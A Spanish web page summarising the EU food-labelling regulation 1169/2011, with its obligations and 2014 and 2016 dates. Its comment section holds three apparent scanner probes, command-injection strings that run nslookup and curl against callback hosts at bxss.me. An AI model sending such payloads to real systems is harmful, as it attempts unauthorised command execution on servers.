Etiquetado de los alimentos - normas de la UE 2014

El nuevo Reglamento de la UE 1169/2011 sobre la información alimentaria facilitada al consumidor, cambios legislación sobre etiquetado de los alimentos incluidos existentes:

  • Información nutricional obligatorio de los alimentos procesados;
  • Etiquetado obligatorio sobre el origen de la carne sin procesar de cerdos, ovejas, cabras y aves de corral;
  • Alergenos destacando, por ejemplo, los cacahuetes o la leche en la lista de ingredientes;
  • Mejor legibilidad es decir, el tamaño mínimo de texto;
  • Requisitos relativos a la información sobre los alérgenos también cubren los alimentos no empaquetados incluyendo los que se venden en los restaurantes y cafeterías.

Las nuevas normas se aplicarán a partir del 13 de diciembre 2014. La obligación de proporcionar información nutricional será aplicable a partir del 13 de diciembre 2016.

Para mas información visite la página oficial

Tags: normativa,
Solo los usuarios registrados pueden dejar comentarios.

Comentarios (35):

0
testing[at]example.com #
&nslookup -q=cname hitzqmtgayakq04d53.bxss.me&'\" `0&nslookup -q=cname hitzqmtgayakq04d53.bxss.me&`'
0
testing[at]example.com #
$(nslookup -q=cname hitzepssqnpwya7038.bxss.me||cu rl hitzepssqnpwya7038.bxss.me)
0
testing[at]example.com #
(nslookup -q=cname hitewoqtefttb0033f.bxss.me||cu rl hitewoqtefttb0033f.bxss.me))